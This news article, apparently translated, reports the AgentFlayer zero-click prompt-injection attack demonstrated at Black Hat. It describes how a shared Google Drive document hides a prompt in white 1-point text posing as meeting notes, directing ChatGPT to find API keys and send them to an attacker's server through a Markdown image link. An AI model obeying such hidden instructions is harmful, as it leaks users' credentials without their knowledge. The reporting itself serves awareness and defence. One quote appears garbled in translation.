
An infected document can leak data on Google Drive via ChatGPT (Photo: Wired).
The worrying point is that this vulnerability does not require any action from the user, raising new warnings about cybersecurity in the context of artificial intelligence (AI) models increasingly connected to personal data.
“Poisoned” documents lead to data leaks
At the Black Hat security conference in Las Vegas (USA) on August 6, two experts Michael Bargury and Tamir Ishay Sharbat demonstrated an attack method called AgentFlayer .
This attack exploits a vulnerability in Connectors – a feature that connects ChatGPT with external services such as Google Drive, Gmail or Microsoft Calendar.
“A user doesn’t need to do anything to be compromised or have their data leaked,” said Michael Bargury, CTO of security firm Zenity. “We’ve proven it’s completely zero-click.”
The attack begins with the attacker sharing a “poisoned” document to the victim’s Google Drive. The document contains a malicious prompt of about 300 words, written in white, 1-point font – almost invisible to the naked eye but still readable to the computer.
On the surface, the text is disguised as meeting notes. In reality, it contains instructions for ChatGPT to find and extract sensitive API keys from the victim's Google Drive account.
Instead of summarizing the content as the user requested, this hidden prompt forces the AI to send the API keys it finds to an external server via a Markdown link. The data is extracted as an image, allowing the server to capture the entire information.
OpenAI has it figured out, but risks remain
OpenAI quickly implemented mitigations after receiving Bargury's report. "It's important to develop robust defenses against rapid-fire malware injection attacks," said Andy Wen, senior director of security product management at Google Workspace.
Although patched, the incident highlights the potential risks of connecting large language models (LLMs) to external systems. As AI becomes more deeply integrated into our lives and work, the attack surface that hackers can exploit also expands.
Experts warn that indirect prompt injection can become a serious threat, allowing attackers to take control of many smart systems, from smart homes to enterprise infrastructure.
“Connecting LLM to external data sources is powerful, but as is often the case with AI, with more power comes more risk,” Bargury concludes.
Source: https://dantri.com.vn/cong-nghe/canh-bao-lo-du-lieu-luu-tru-tren-google-drive-thong-qua-chatgpt-20250807155706949.htm
Comment (0)